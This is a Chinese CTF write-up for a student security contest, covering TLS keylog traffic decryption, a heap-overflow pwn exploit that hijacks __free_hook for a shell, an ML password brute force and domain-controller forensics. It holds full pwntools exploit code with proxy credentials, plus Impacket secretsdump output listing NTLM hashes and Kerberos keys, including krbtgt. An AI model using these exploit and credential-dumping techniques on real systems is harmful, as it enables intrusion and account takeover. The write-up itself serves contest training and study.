第十八届全国大学生软件系统安全赛-现场赛wp

5G消息

CTF-NetA分析流量包，其解析tls流量需要tls.keylog文件

tcp流中存在明文

多条流量中包含了keylog的内容

几段内容拼接后内容为：

# sslkeylog

SERVER_HANDSHAKE_TRAFFIC_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 994da7436ac3193aff9c2ebaa3c072ea2c5b704683928e9f6e24d183e7e530386c1dcd186b9286f98249b4dc90d8b795
EXPORTER_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 31882156a3212a425590ce171cb78068ee63e7358b587fed472d45d67ea567d98a079c84867a18665732cf0bfe18f0b0
SERVER_TRAFFIC_SECRET_0 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 1fbf7c07ca88c7c91be9cce4c9051f2f4bd7fb9714920661d026119ebab458db8637089348dd5a92dc75633bdcf43630
CLIENT_HANDSHAKE_TRAFFIC_SECRET 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 a98fab3039737579a50e2b3d0bbaba7c9fcf6881d26ccf15890b06d723ba605f096dbe448cd9dcc6cf4ef5c82d187bd0
CLIENT_TRAFFIC_SECRET_0 9745a631db0b9b715f18a55220e17c88fdf3389c0ee899cfcc45faa8696462c1 646306cb35d94f23e125225dc3d3c727df65b6fcec4c6cd77b6f8e2ff36d48e2b7e92e8f9188597c961866b3b667f405

重新分析tls流量

发现存在png信息

数据保存为图片

得到flag：abcdef1234567890deadbeefc0ffeeba

---

用wireshark来解tls流量

导入sslkeylog文件

筛选tls流量，可以发现http传输了png图片信息

encoder-攻击

64位，保护全开

菜单题，实现了一个简单的文件管理系统，有以下功能：

1. upload
2. download
3. encode
4. decode
5. release

encode使用RLE算法对文件进行编码，在编码数据前添加头部信息:“RLE\n”、编码后长度、校验和

memcpy(ptr, "RLE\n", sizeof(_DWORD));
ptr[1] = v5;
*(_DWORD *)((char *)ptr + v5 + 8) = sumBytes((__int64)(ptr + 2), v5);

decode函数用于解码encode函数编码后的文件，仅对头部进行检验，我们可以通过伪造头部信息，来覆盖相邻的堆块大小，再利用release函数即可实现泄露libc和free_hook

利用过程

malloc一个伪造的块，用于溢出覆盖相邻堆大小，再malloc几个小块，decode伪造块修改大小后，即可利用unsortedbin attack泄露libc

修改fd指针为__free_hook-0x8，后续分配会写在__free_hook-0x8的位置，即可实现修改__free_hook为system，劫持__free_hook触发shell

exp

from pwn import *
import sys
import socks
import socket

# 设置 SOCKS5 代理
socks.set_default_proxy(
    socks.SOCKS5,
    "8.kernel.ccsssc.hunau.edu.cn",
    27335,
    username="dmp1mowm",
    password="teossw4o"
)
socket.socket = socks.socksocket
context(arch='amd64', os='linux', log_level='debug')

challenge = "./encoder"
def debug():
    gdb.attach(io)
    pause()

def dbg():
    context.log_level = 'debug'

def echo(content):
    print("\033[4;36;40mOutput prompts:\033[0m" + "\t\033[7;33;40m[*]\033[0m " + "\033[1;31;40m" + content + "\033[0m")

def upload(idx,data):
    sla(b">>", b"1")
    sla(b"Idx:",str(idx).encode())
    sla(b"Size:",str(len(data)).encode())
    sa(b"Data:",data)
def download(idx):
    sla(b">>", b"2")
    sla(b"Idx:",str(idx).encode())
def free(idx):
    sla(b">>", b"5")
    sla(b"Idx:",str(idx).encode())
def decode(idx):
    sla(b">>", b"4")
    sla(b"Idx:",str(idx).encode())
def calc_sum(data):
    sum = 0
    for i in data:
        sum += i
    return sum

def exp():
    #伪造decode块
    payload = b"RLE\n"
    payload += p32(1)+b'\xff'
    payload += p32(0x500)
    payload += p32(0xffffff00) + p8(0xa)
    payload += b'\x00'*(0x48-9)
    payload += p16(0x4f1)
    payload = payload.ljust(0x7f,b'\x00')
    upload(0,payload)
    upload(1,b"1"*0x100)
    upload(2,b"2"*0x48)
    upload(3,b"3"*0x18)
    upload(4,b"4"*0x28)
    upload(5,b"5"*0x18)
    upload(6,b"6"*0x18)
    upload(7,(p64(0)+p64(0x21))*(0x500//2))
    free(2)
    decode(0) # overflow
    free(3)
    upload(3,b"3"*0x18)
    download(4)
    libc_base = uu64(ru(b'\x7f')[-6:]) - 0x1ecbe0 #
    echo("libc_base: "+hex(libc_base))
    libc = ELF("./libc-2.31.so")
    system = libc_base + libc.symbols['system']
    free_hook = libc_base + libc.symbols['__free_hook']
    free(6)
    free(5)
    #__free_hook
    payload = b'\x00'*0x28+p64(0x21)+p64(free_hook-0x8)
    upload(8,payload)
    #debug()
    upload(9,b"9"*0x18)
    #debug()
    upload(10,b"/bin/sh\x00"+p64(system)+p64(0))
    debug()
    free(10)

local = int(sys.argv[1])
elf = ELF(challenge)

context.terminal=["cmd.exe","/c", "start", "cmd.exe", "/c", "wsl.exe", "-e"]

if local:
    io = process(challenge)
else:
    # 使用代理连接远程服务器
    io = remote("192.0.100.2", 8888)

p   = lambda      : pause() 
s   = lambda x    : success(x)
re  = lambda m, t : io.recv(numb=m, timeout=t)
ru  = lambda x    : io.recvuntil(x)
rl  = lambda      : io.recvline()
sd  = lambda x    : io.send(x)
sl  = lambda x    : io.sendline(x)
ia  = lambda      : io.interactive()
sla = lambda a, b : io.sendlineafter(a, b)
sa  = lambda a, b : io.sendafter(a, b)
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))

exp()
ia()

ez_sight

明文攻击解压缩包

使用给的password.pt模型对图片进行预测

import torch
import torch.nn as nn
import torch.nn.functional as F
from PIL import Image
import torchvision.transforms as transforms
import glob

class SimpleCNN(nn.Module):
    def __init__(self):
        super(SimpleCNN, self).__init__()
        self.conv1 = nn.Conv2d(1, 16, kernel_size=3, padding=1)  # 输入通道 1，输出通道 16
        self.conv2 = nn.Conv2d(16, 32, kernel_size=3, padding=1)  # 输入通道 16，输出通道 32
        self.fc1 = nn.Linear(32 * 7 * 7, 128)  # 全连接层 1
        self.fc2 = nn.Linear(128, 62)  # 全连接层 2，假设输出 62 类（0-9, a-z, A-Z）

    def forward(self, x):
        x = F.relu(self.conv1(x))  # 激活函数
        x = F.max_pool2d(x, 2)  # 池化层 1
        x = F.relu(self.conv2(x))  # 激活函数
        x = F.max_pool2d(x, 2)  # 池化层 2
        x = x.view(x.size(0), -1)  # 展平
        x = F.relu(self.fc1(x))  # 激活函数
        x = self.fc2(x)  # 输出层
        return x

# 加载模型
model = torch.load('password.pt', weights_only=False)
model.eval()  # 设置为评估模式


print(model)


transform = transforms.Compose([
    #transforms.Grayscale(num_output_channels=1),  # 转为灰度图
    transforms.ToTensor(),  # 转为张量
    transforms.Normalize(mean=[0.5], std=[0.5])  # 归一化
])

image_files = sorted(glob.glob('*.bmp')) 
for idx, img_file in enumerate(image_files):
    image = Image.open(img_file)
    image = transform(image).unsqueeze(0)  

    with torch.no_grad():
        output = model(image)
        probabilities = F.softmax(output, dim=1)  
        top4_prob, top4_indices = torch.topk(probabilities, 10)  # 获取概率最高的类别

    print(f"\n图片 {idx + 1}: {img_file}")
    for i in range(10):
        prob = top4_prob[0][i].item()  # 获取概率值
        pred = top4_indices[0][i].item()  # 获取预测类别
        print(f"  预测类别 {i + 1}: {pred}, 概率: {prob:.4f}")

取每个位置概率最高的几个数字爆破

import uuid
import hashlib

possible_digits = [
    [8,0,9,3,5,2],
    [1,7],
    [8,2,1],
    [3,9,5,8],
    [4,5,1,9,7,8,3],
    [6,5,8,4],
    [5,6,8],
    [8,9,7,1,0],
    [8,3],
    [9,8,3],
    [9,4,7],
    [8,0,3],
    [8,2,5,7,4,1,9],
    [4,5,7]
]

target_hash = "115159c751ddf16c527ee96f998ed55ed8a3302f2fd04ba60682493883901684"

def generate_flags(index, current_flag):
    if index == 14:
        final_flag = "dart{" + str(uuid.uuid3(uuid.UUID('11341600-1542-4ee8-b148-23940f18186b'), current_flag)) + "}"
        sha256_hash = hashlib.sha256(final_flag.encode("utf8")).hexdigest()
        if sha256_hash == target_hash:
            print(current_flag)
            print("Correct flag found:", final_flag)
            return True
        return False
    for digit in possible_digits[index]:
        if generate_flags(index + 1, current_flag + str(digit)):
            return True
    return False

generate_flags(0, "")

得解

DC-Forensics-1

检查证书颁发机构日志：

• 查看CA服务器上的Windows事件日志，特别是Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational
• 查找可疑的证书颁发事件

检查证书数据库：

• 查看CA数据库文件（默认位于%SystemRoot%\System32\CertLog）
• 使用certutil工具查询颁发的证书

Windows\System32\CertLog目录下，找到CA数据库文件

将文件导出后在ESEDatabaseView中查看

第3条信息即为我们所求的证书信息

MyTem-5400000003eedab5344b2e5da5000000000003

DC-Forensics-2

检查杀毒软件日志

• 查看Windows Defender、Symantec或其他杀毒软件的隔离/检测日志
• 路径通常位于：C:\ProgramData\Microsoft\Windows Defender\Quarantine 或杀毒软件特定目录

检查Windows事件日志

• 访问事件查看器

  • 方法一：图形界面

    按Win+R，输入eventvwr.msc回车或通过”控制面板 > 管理工具 > 事件查看器”

  • 方法二：命令行

    wevtutil qe Security /rd:true /f:text /q:"*[System[(EventID=4688)]]"

  • 关键日志位置

    • 安全日志 (Security)

      路径：Windows Logs > Security

      重要事件ID：

      **4624**：成功登录
                    
      **4625**：失败登录
                    
      **4672**：特殊权限分配(如管理员)
                    
      **4688**：进程创建
                    
      **4697**：服务安装
                    
      **4703**：令牌权限调整
      

    • 系统日志 (System)

      路径：Windows Logs > System

      关注服务异常启动、驱动加载等

    • 应用程序日志 (Application)

      杀毒软件日志通常在这里

    • 特定服务日志

      Applications and Services Logs > Microsoft > Windows下：

      PowerShell/Operational (Event ID 4103-4104)

      Sysmon/Operational (如有配置)

      Windows Defender/Operational

全局搜索defender,找到.evtx文件

打开evtx文件，找到木马程序的上传路径C:\Users\Public\e9caab4405a14fb6.exe

DC-Forensics-3

DC-Forensics-4

检查安全日志中的账户创建事件

在security.evtx 找 Security Group Management

关键事件ID：

• 4720：用户账户创建
• 4726：用户账户删除
• 4728：将成员添加到启用安全的全局组中
• 4732：将成员添加到启用安全的本地组中

全局搜索evtx文件

事件查看器打开，过滤4728事件,找到组名和用户名maintainer,James

在Windos\NTDS 文件夹找到 ntds.dit，通过Impacket提取域内所有用户的hash

 34405@Warmlight D:\....\examples  master  python .\secretsdump.py -system "C:\Users\34405\Desktop\SYSTEM" -ntds "C:\Users\34405\Desktop\ntds.dit" LOCAL
Impacket v0.13.0.dev0+20250326.105809.0711a41e - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8044866ff95b2378568f795d988d1d3e
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f3be9e9410d93545451f65dcf50188a4
[*] Reading and decrypting hashes from C:\Users\34405\Desktop\ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f0e42db02cf933707a4aa3575bab3b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
john:1000:aad3b435b51404eeaad3b435b51404ee:4b679d47454b3bf0ba434d62c09ba644:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:dbe46b92afe60335e751c96f6c4d7810:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:13fcb179f2788c599b27c0cefc445562:::
CLIENT$:1104:aad3b435b51404eeaad3b435b51404ee:c4d288a337abeb621ebb12e40ddf67c9:::
Hannah:3102:aad3b435b51404eeaad3b435b51404ee:9b1d28539cc145c85086f38776169fea:::
Joshua:3103:aad3b435b51404eeaad3b435b51404ee:db03e6daa244825c00d3f7e294d27d6f:::
Isabella:3104:aad3b435b51404eeaad3b435b51404ee:82d1759cdeb5c8725fc8e7788b83e426:::
Kevin:3105:aad3b435b51404eeaad3b435b51404ee:599ed14dfebb2ec097ca628f49e1d423:::
Amber:3106:aad3b435b51404eeaad3b435b51404ee:cf6925a3afed551ed10a5419da377a95:::
Lillian:3109:aad3b435b51404eeaad3b435b51404ee:d3de8712ca56c72eebed117d3565873a:::
Blake:3110:aad3b435b51404eeaad3b435b51404ee:f469f6426abb7f7cb5e8844d4ca76523:::
Samantha:3112:aad3b435b51404eeaad3b435b51404ee:8dedf5bc821230e586b5c21035970744:::
Nicole:3113:aad3b435b51404eeaad3b435b51404ee:dfa885e9a64b5c0384288ffcdc8659e1:::
Logan:3114:aad3b435b51404eeaad3b435b51404ee:838fd57bf783bb09991ae4712131864f:::
Jessica:3116:aad3b435b51404eeaad3b435b51404ee:d095ea11af14fcf4669e76c684d6ec49:::
Charlotte:3117:aad3b435b51404eeaad3b435b51404ee:029123a5809a5c0d2447188266dab17f:::
Francis:3120:aad3b435b51404eeaad3b435b51404ee:6e9c54e1ef0ef8a26d86cbab01686d14:::
Brittany:3124:aad3b435b51404eeaad3b435b51404ee:96f3648994ddb91648ac7b461ba7540e:::
Aaron:3125:aad3b435b51404eeaad3b435b51404ee:1e18c5b51df4e3e2a04cab4a2ddcc606:::
Emily:3126:aad3b435b51404eeaad3b435b51404ee:8f0d151425872dc248b8af7159f24579:::
Katherine:3128:aad3b435b51404eeaad3b435b51404ee:cb809cb896174cf6faf9a2a791bd9d86:::
Nathan:3133:aad3b435b51404eeaad3b435b51404ee:21be91e8953da8ad0513df5a5552e803:::
Bethany:3134:aad3b435b51404eeaad3b435b51404ee:406caf707b7bd627f29f097762fc17cb:::
Derek:3135:aad3b435b51404eeaad3b435b51404ee:a22e1a8440d6d8beb7a77a18edc72c42:::
Abigail:3136:aad3b435b51404eeaad3b435b51404ee:a7e1a39cd7c7f40c1bf2d61baf69e302:::
Daniel:3137:aad3b435b51404eeaad3b435b51404ee:12f1eac19900aae4f5692bfa7ed55fa7:::
Ashley:3142:aad3b435b51404eeaad3b435b51404ee:f030c60a6bba9829fc26a4e4d0707f40:::
Emma:3144:aad3b435b51404eeaad3b435b51404ee:0363dee43a91a09cbf413259bb1a997e:::
Brandon:3145:aad3b435b51404eeaad3b435b51404ee:cb5183ecb944dd2f9d9ffda4666699ee:::
Laura:3146:aad3b435b51404eeaad3b435b51404ee:7912be0e7e04010d855b5aaac0652b21:::
George:3147:aad3b435b51404eeaad3b435b51404ee:5c27498c56f7da5eba7c536f2d4c4c0e:::
Harper:3148:aad3b435b51404eeaad3b435b51404ee:de4e876e5628791377184d233ece9b2f:::
Matthew:3149:aad3b435b51404eeaad3b435b51404ee:1ac5e256431fa8982db64af20d4554f2:::
Benjamin:3151:aad3b435b51404eeaad3b435b51404ee:8bd9a7cf8167c7ae09b2e296f11bf3cd:::
Leah:3153:aad3b435b51404eeaad3b435b51404ee:4245664d67e5b0b8db11abdd0a135908:::
Elizabeth:3159:aad3b435b51404eeaad3b435b51404ee:775689673a62a33cb35117d93c6b8aed:::
Connor:3160:aad3b435b51404eeaad3b435b51404ee:aaaa411583594936b88bbcfbc713bec8:::
Angela:3162:aad3b435b51404eeaad3b435b51404ee:1854c60dc8265016521fcd64007e6ec1:::
Aiden:3165:aad3b435b51404eeaad3b435b51404ee:329b3015e8205a3add613062fd0b49f1:::
Julia:3171:aad3b435b51404eeaad3b435b51404ee:35447ece3cf29380cdf229ed556ad626:::
Charles:3172:aad3b435b51404eeaad3b435b51404ee:fdf77af33704f0f5b9d2d49ef978ac85:::
Adrian:3173:aad3b435b51404eeaad3b435b51404ee:db8ed3ef3d6ef1e9b7e9bab493176a0b:::
Liam:3174:aad3b435b51404eeaad3b435b51404ee:8eadd9d479600d1cb9b51a063dfa298b:::
Brooke:3176:aad3b435b51404eeaad3b435b51404ee:959acd2731022f135ae87c27f15783a6:::
Alan:3177:aad3b435b51404eeaad3b435b51404ee:5603b7c6420640265f9eb7be684241ed:::
Ella:3178:aad3b435b51404eeaad3b435b51404ee:763ecdade02a78f952c71814a0e70c62:::
Caleb:3179:aad3b435b51404eeaad3b435b51404ee:576619eb3d35633613b0581425d74a6f:::
Noah:3180:aad3b435b51404eeaad3b435b51404ee:28a05da8b680cd692c44d78b4789e10f:::
Donald:3181:aad3b435b51404eeaad3b435b51404ee:d9d7c8ac83b284a3c0ab191c31e4e8e0:::
Alexander:3183:aad3b435b51404eeaad3b435b51404ee:c71320f068bd82730c1e8a6e86d9872e:::
Austin:3184:aad3b435b51404eeaad3b435b51404ee:9e9a8992851d382126d798af0f7d4eca:::
Michelle:3187:aad3b435b51404eeaad3b435b51404ee:805a51f35bcfa168ae3c328b9279e70b:::
Adam:3188:aad3b435b51404eeaad3b435b51404ee:e0c59c48452659eb5a885158d725e1e2:::
Isaiah:3189:aad3b435b51404eeaad3b435b51404ee:b37e1f03a36b28bed2bcef6aa492412d:::
Anthony:3191:aad3b435b51404eeaad3b435b51404ee:4ac6515bfd3ea713140a4c2e18922d85:::
mary:3192:aad3b435b51404eeaad3b435b51404ee:1e5f261cdec77428aaa79a0ba5c133af:::
James:3193:aad3b435b51404eeaad3b435b51404ee:9fc8c6b0ac495fa52039ab6e0276a3c3:::
[*] Kerberos keys from C:\Users\34405\Desktop\ntds.dit
Administrator:aes256-cts-hmac-sha1-96:b4973e980f1126987cf91525d4d97db242d308c314a0c11afa7b3d486faa742f
Administrator:aes128-cts-hmac-sha1-96:866294af0f0a844c77fab4bd5eca9dc7
Administrator:des-cbc-md5:89256d1c02a2b0ba
john:aes256-cts-hmac-sha1-96:2a6743e85897a8880c484aecc0d39700f9aa0c980a8e99ac50489bb553c4ede4
john:aes128-cts-hmac-sha1-96:15346b18cc86078657e6a1555d3e70a0
john:des-cbc-md5:ba540eb094fd04c1
DC$:aes256-cts-hmac-sha1-96:bd90739c9265896a17f387d6e23da294391927b7b9d0f18296d2351904c8721f
DC$:aes128-cts-hmac-sha1-96:b6363a1fe42f1e9a2bbedaf4ef066430
DC$:des-cbc-md5:adef34f4ea7f73da
krbtgt:aes256-cts-hmac-sha1-96:c19ba00f164b26796050ecb884d5f7e13ba0aae086c7486f64660be3d6ff39e9
krbtgt:aes128-cts-hmac-sha1-96:e2e6c395b9b8d172cfb0a42998a233c7
krbtgt:des-cbc-md5:70835157b375df62
CLIENT$:aes256-cts-hmac-sha1-96:f66e981944d3a1650d14d2f9e1b593ed780cf4ee505132aa44cb1ce4b24c5839
CLIENT$:aes128-cts-hmac-sha1-96:10e1b55dbf25099ed30572de6ecee205
CLIENT$:des-cbc-md5:404fcbb67afd5dc1
Hannah:aes256-cts-hmac-sha1-96:f5dfd1876831f3b913965eab3d8af711453b151ba510a81e2431819e011cafa1
Hannah:aes128-cts-hmac-sha1-96:f36eb5f85770dc9af7e4ba9e0854b25e
Hannah:des-cbc-md5:b62ccbd0ab9e25e5
Joshua:aes256-cts-hmac-sha1-96:b430e1c3ac7bd4be593fd51d55e7bbb1953203013f7177e009a1d9da1b516f26
Joshua:aes128-cts-hmac-sha1-96:49890ebe537ae6401af4a3209426f4f1
Joshua:des-cbc-md5:5d4f94ea38a4d525
Isabella:aes256-cts-hmac-sha1-96:f4e36f7525971ee7948ece86656ff3644e1762dfaa2e5e045735de04badd71ff
Isabella:aes128-cts-hmac-sha1-96:b192a765dc7d3b12183081328c66581f
Isabella:des-cbc-md5:c85b23e65761b6e3
Kevin:aes256-cts-hmac-sha1-96:43b7751d1c3074bd9a90719bdfb1de46bc59e8791eb1df6de45e1b0cf1f52071
Kevin:aes128-cts-hmac-sha1-96:3ed50ef7239c1f4fdf7fc05bdfe2f451
Kevin:des-cbc-md5:8546e075df80fd3e
Amber:aes256-cts-hmac-sha1-96:3c51e715c551cbf36706a63dd97bd79f89a95ed1bd46414ce157c48cdd077b76
Amber:aes128-cts-hmac-sha1-96:242c8bd7cd6b79ed5e33d7f7123c9aa8
Amber:des-cbc-md5:6de06e756bad575b
Lillian:aes256-cts-hmac-sha1-96:96b235fb7b694a81c7e136be5342cae8b2f1c151480db55db9d7ebd6b9217c9c
Lillian:aes128-cts-hmac-sha1-96:a97e3811a9d0d25c7eac27a2316e4010
Lillian:des-cbc-md5:df1032b5374f4a98
Blake:aes256-cts-hmac-sha1-96:12b14056196a17ec0852ba677905874ddbb8d8e2ae494286249331e987bc8e51
Blake:aes128-cts-hmac-sha1-96:66ad920ff8ef4a2f8363388a1b700f9f
Blake:des-cbc-md5:ad4523c75be36d85
Samantha:aes256-cts-hmac-sha1-96:14f02ffa4b9bc989eb8a8b8840df596b64a95492a0fe4d8c5561ad41955680b7
Samantha:aes128-cts-hmac-sha1-96:ef51abbe5e1a0d170fd112a1a4a2090c
Samantha:des-cbc-md5:1ad676c27c1ac87f
Nicole:aes256-cts-hmac-sha1-96:5c8d68b7e0ae4fd9e5b36771698bd527a5e88a712ae4c22bd655b19a1915d7b3
Nicole:aes128-cts-hmac-sha1-96:46c9c96fefc6f8b55909ecc69a4881a4
Nicole:des-cbc-md5:b91579ef4510c49e
Logan:aes256-cts-hmac-sha1-96:40591ce121f13256826b8e6af83546432973cf1a5c31a1eb5576f43b6b72a694
Logan:aes128-cts-hmac-sha1-96:511ddca5380e6d4a2e2a0b9d0171ff12
Logan:des-cbc-md5:80f894a29d08928a
Jessica:aes256-cts-hmac-sha1-96:2fe3f0d5cc2b4cba7652870d8d244645c5369bd4d9cb645e40b991b8f7a160ea
Jessica:aes128-cts-hmac-sha1-96:d945d5ebc33231bf815cdfb186e538ef
Jessica:des-cbc-md5:45efd6d023190eea
Charlotte:aes256-cts-hmac-sha1-96:2832b3b4722402b5ee72750dea9b56210db8c7fe7761c168a25db7e1a9d268cf
Charlotte:aes128-cts-hmac-sha1-96:c44ee26970237ce2081a5828cbdabab0
Charlotte:des-cbc-md5:4926089ba8a7e997
Francis:aes256-cts-hmac-sha1-96:0732cfa9e29220872358aaf946985ebda9e167debf0412ee8c5041276ce160fb
Francis:aes128-cts-hmac-sha1-96:76058e2a6419ba17944d9f37ea18093d
Francis:des-cbc-md5:02bf3de9e543e0c2
Brittany:aes256-cts-hmac-sha1-96:fcc16041186d564c5bebc54a32aa76ba9927b8fcc075fc798efc4585352a87db
Brittany:aes128-cts-hmac-sha1-96:cb05e77257066aaa0a894ab322b16de6
Brittany:des-cbc-md5:6e57f19408f27946
Aaron:aes256-cts-hmac-sha1-96:1ad72a9f3b912d104dd301441dae66fc2ef90da01689ffbce1d981c6f7673792
Aaron:aes128-cts-hmac-sha1-96:11c0d01aa7885243337b2f1ae9c455d9
Aaron:des-cbc-md5:37b6676d19b91307
Emily:aes256-cts-hmac-sha1-96:52992869238b0b4839c6db6dda4f6b43720032e47b3249bfe4a19caee2999962
Emily:aes128-cts-hmac-sha1-96:751fe2523800366258088cd9f8c359a1
Emily:des-cbc-md5:13b940b93257cee6
Katherine:aes256-cts-hmac-sha1-96:758b87aa1fbe11963b42b76a46a14778e219815a6b19b87299af146da0082132
Katherine:aes128-cts-hmac-sha1-96:a61b0884284b1fdbe7ad7706270b3c6c
Katherine:des-cbc-md5:0ec7910e76fdda79
Nathan:aes256-cts-hmac-sha1-96:6ed510ea3da9b3b77dadcf0e1f9683ab5c076326eee53f60106f21be03c07e2e
Nathan:aes128-cts-hmac-sha1-96:6e8e3b4765ab033db2b1df04ca4da0fd
Nathan:des-cbc-md5:df9d92b379231613
Bethany:aes256-cts-hmac-sha1-96:44ded16920b1588a48aeb50e4d6e554421f8d2d2e87bf143fc3a53eabd5a97dc
Bethany:aes128-cts-hmac-sha1-96:822b1c8151b0a9c2c29a994b6d9564c2
Bethany:des-cbc-md5:da7c6d928086a49e
Derek:aes256-cts-hmac-sha1-96:913684f108b5a7cccf8333b00530ec9e78712210662de128f9865f61bc8c7dee
Derek:aes128-cts-hmac-sha1-96:47321c9441e1ba242a766bfded0e3bbb
Derek:des-cbc-md5:3e1af2e38adc9852
Abigail:aes256-cts-hmac-sha1-96:70b833e81f210afbe176366ca8ef1f17615c246efce1daa3564488256f12dc6f
Abigail:aes128-cts-hmac-sha1-96:35fa0bc32176efbf7fd3323a7d716908
Abigail:des-cbc-md5:34fb98e0453d0183
Daniel:aes256-cts-hmac-sha1-96:26a3748198d75fb82500077a61e595a7251a8830e1a1e8852bb2c1cd6072edcb
Daniel:aes128-cts-hmac-sha1-96:659897df7220dc3f90624a5a69135fd2
Daniel:des-cbc-md5:b65df86b5d850102
Ashley:aes256-cts-hmac-sha1-96:ab935a669a8fe74c5afd9f47179690022429c3d91fba803ff87f4a34836f008a
Ashley:aes128-cts-hmac-sha1-96:6bc87b24d72e8fb5c6c90934770b3d8b
Ashley:des-cbc-md5:ad2c527f61021f8c
Emma:aes256-cts-hmac-sha1-96:6db06f2f8b92ee46db78c9de9179b7408cbe2af7218d7b3709f3a9cf678a153c
Emma:aes128-cts-hmac-sha1-96:817ab112142e859a216d17db023ae5d6
Emma:des-cbc-md5:c29e4cd64fad0267
Brandon:aes256-cts-hmac-sha1-96:ee2dce89ad6a520d9494dab243f583c484444df7c0a8a6a6211fab37eb54c9f0
Brandon:aes128-cts-hmac-sha1-96:bd3d79603f130ce8bae83e5582190315
Brandon:des-cbc-md5:43aef201ae8f8351
Laura:aes256-cts-hmac-sha1-96:ffc0621435d2072391123b966a339d6116a07efc15291c5dc4d77132b2376edf
Laura:aes128-cts-hmac-sha1-96:13aeb186b5a83518f4bbe7bd2f608b8f
Laura:des-cbc-md5:324349c85b0e1558
George:aes256-cts-hmac-sha1-96:53cae56304a93b6a762617dc0cb5f9f97087e3437ac8b0e299684b355b60e087
George:aes128-cts-hmac-sha1-96:18592734077ae853cf99394b4590c909
George:des-cbc-md5:9ed525c179aedcba
Harper:aes256-cts-hmac-sha1-96:eb304b0b6c0d93076a5f7e67d69d144a0d8b2a4e7b0165a57690ef0335fad0e8
Harper:aes128-cts-hmac-sha1-96:399547164b1c50a2f51d5c42644100c9
Harper:des-cbc-md5:150497198092ea9d
Matthew:aes256-cts-hmac-sha1-96:8e9eb6e892bd0470f9a1d764f41b9cf0865ec3d271f2d3c7a45b48010b7fa755
Matthew:aes128-cts-hmac-sha1-96:630ab00434d159e4c319703348aa5c07
Matthew:des-cbc-md5:01c4850897bc19ae
Benjamin:aes256-cts-hmac-sha1-96:cbf3227b8edb84b7e05cf282acc982bf57ad868d16f31b79bfd64c8402df89a5
Benjamin:aes128-cts-hmac-sha1-96:508e75afd5858721778db4cbc67951d7
Benjamin:des-cbc-md5:20680d0ee6925801
Leah:aes256-cts-hmac-sha1-96:f3c342a8b4fa0d1534ced21b8256e424daecc8ff6c61d304501d183610fa9496
Leah:aes128-cts-hmac-sha1-96:5dc194200a238e33b8853d827e1654dc
Leah:des-cbc-md5:79ce25439e92a838
Elizabeth:aes256-cts-hmac-sha1-96:d7e8aa7e2fdc6ec714492c897e3abe05a96d7d158b7d66a7b580edb33b34472d
Elizabeth:aes128-cts-hmac-sha1-96:93b25e494b6eeb9b72301dcfb94325a7
Elizabeth:des-cbc-md5:cb8aa2b59befba10
Connor:aes256-cts-hmac-sha1-96:ab5e72fd28ec1b4c201bb8ac46fc0fa9fc6cda0f6b4bd47d63559575cab3ec34
Connor:aes128-cts-hmac-sha1-96:6265e830a18293c8ee87e3ea6b7f7665
Connor:des-cbc-md5:6ee65408b68532f2
Angela:aes256-cts-hmac-sha1-96:0e43c362897254dc9cada5f55675c73d7bd7c8ea7f84d759ba1d95d397519d96
Angela:aes128-cts-hmac-sha1-96:cb16ae5aff64fc14da9a22a005b4edc6
Angela:des-cbc-md5:20a8e66d02b03840
Aiden:aes256-cts-hmac-sha1-96:200466c671bfd62756f79c48348789811fe06756b01691dba2db0aad0a420c77
Aiden:aes128-cts-hmac-sha1-96:f83f287a27976e6eced1d1444f5dd6eb
Aiden:des-cbc-md5:eff26db952047920
Julia:aes256-cts-hmac-sha1-96:f566e3af8e52609fdab00ae8cc754e42a5d9a7e4e321b16a369a54669b24e44b
Julia:aes128-cts-hmac-sha1-96:07df647146898a9763571db6a8149e3e
Julia:des-cbc-md5:94087a9ef46b52bf
Charles:aes256-cts-hmac-sha1-96:064f7fe1ee20b21dc1ceaee7efbffa18c45e6b93d6cd50ec72638ee4f1cb8429
Charles:aes128-cts-hmac-sha1-96:9308806bc1d25e296f8edbaafbfa0da6
Charles:des-cbc-md5:7a6b6b2c8c1338bf
Adrian:aes256-cts-hmac-sha1-96:ce703b72d1765e7a0c8791248672e41d8f3a250cb354d088b2a87d5cc767b672
Adrian:aes128-cts-hmac-sha1-96:fa189c0463e0551019863da5c1333978
Adrian:des-cbc-md5:37cb0454ea43b96e
Liam:aes256-cts-hmac-sha1-96:49b1e51560375949e47165759673b0653a3fd3c8dd154d1cc14554509e01495a
Liam:aes128-cts-hmac-sha1-96:c324605385e73ed12980eae8288eee08
Liam:des-cbc-md5:2f3df7cbb073bfd0
Brooke:aes256-cts-hmac-sha1-96:9c8e2fda8f8743a3cf2c549aa6180bdf979484aa56af32b521814bc47097c80e
Brooke:aes128-cts-hmac-sha1-96:6736c776ff203e525d6dea0da3a9d2c7
Brooke:des-cbc-md5:75156832f179e0a4
Alan:aes256-cts-hmac-sha1-96:570208f6a9def255dd5567d6f62d59319d74a0c8c4fb7d281d41533364b907f0
Alan:aes128-cts-hmac-sha1-96:e8319c480d1ed57a1fd250482eb357b6
Alan:des-cbc-md5:7c407ca1cd513d9d
Ella:aes256-cts-hmac-sha1-96:ef150cd991e6a02aae3d74087a90fcc364853d2efb9d3f6e41d09c932a5df897
Ella:aes128-cts-hmac-sha1-96:99e1a83e9a4e96406be2b591f7583b22
Ella:des-cbc-md5:a8f46ee0a720e39b
Caleb:aes256-cts-hmac-sha1-96:95da18fecd659b13d89bacfe18eb321244a1b15cda8511a754b1eb76f16a912a
Caleb:aes128-cts-hmac-sha1-96:87fa1125ffe9d62a7f9b9e90c3caede0
Caleb:des-cbc-md5:ae7cf2dce92ad0e3
